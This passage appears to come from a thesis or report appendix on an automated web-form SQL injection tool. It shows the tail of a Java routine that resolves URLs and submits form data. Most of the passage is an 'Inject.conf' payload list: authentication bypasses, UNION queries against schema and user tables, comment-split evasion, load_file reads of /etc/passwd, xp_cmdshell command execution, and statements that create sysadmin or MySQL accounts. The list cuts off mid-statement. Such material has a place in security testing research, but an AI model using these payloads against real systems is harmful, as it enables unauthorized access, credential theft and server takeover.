}
if(var.charAt(0)=='/') {
var=globalURL+var;
}
else if(!var.contains("http") & !var.contains("https")& !var.contains("www")) {
int ind=globalURL.lastIndexOf("/");
int cind=globalURL.lastIndexOf("//");
String rt;
if(ind==cind+1) {
54
rt=globalURL;
}
else {
rt=globalURL.substring(0,ind);
}
var=rt+'/'+var;
}
//new ProcessBuilder("C:\\Program Files\\Mozilla Firefox\\firefox", "temp.html").start();
if(globalDetailFlag==true) {
System.out.println("data: "+data);
System.out.println("Form #: "+currentForm);
}
if(globalDetailFlag==false)
if(flipFlop==false) {
System.out.println(">>");
flipFlop=true;
}
else {
System.out.println("<<");
flipFlop=false;
}
sendBack(data);
if(globalDetailFlag==true)
System.out.println("###########################################################
#############################################################");
}
}
}
55
Inject.conf:
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Admin' OR '
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects
WHERE name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing'
' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select
56
Password:*/=1--
UNI/**/ON SEL/**/ECT
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXEC ('SEL' + 'ECT US' + 'ER')
'/**/OR/**/1/**/=/**/1
' or 1/*
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+&password=
'; begin declare @var varchar(8000) set @var=':' select
@var=@var+'+login+'/'+password+' ' from users where login >
@var select @var as var into temp end --
' and 1 in (select var from temp)--
' union select 1,load_file('/etc/passwd'),1,1,1;
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
CREATE USER name IDENTIFIED BY 'pass123'
CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE
temp DEFAULT TABLESPACE users;
' ; drop table temp --
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost',
PASSWORD('pass123'))
GRANT CONNECT TO name; GRANT RESOURCE TO name;
INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) +
char(0x74) + char(0x65) + char(0x72) + char(0x70)
+ char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
57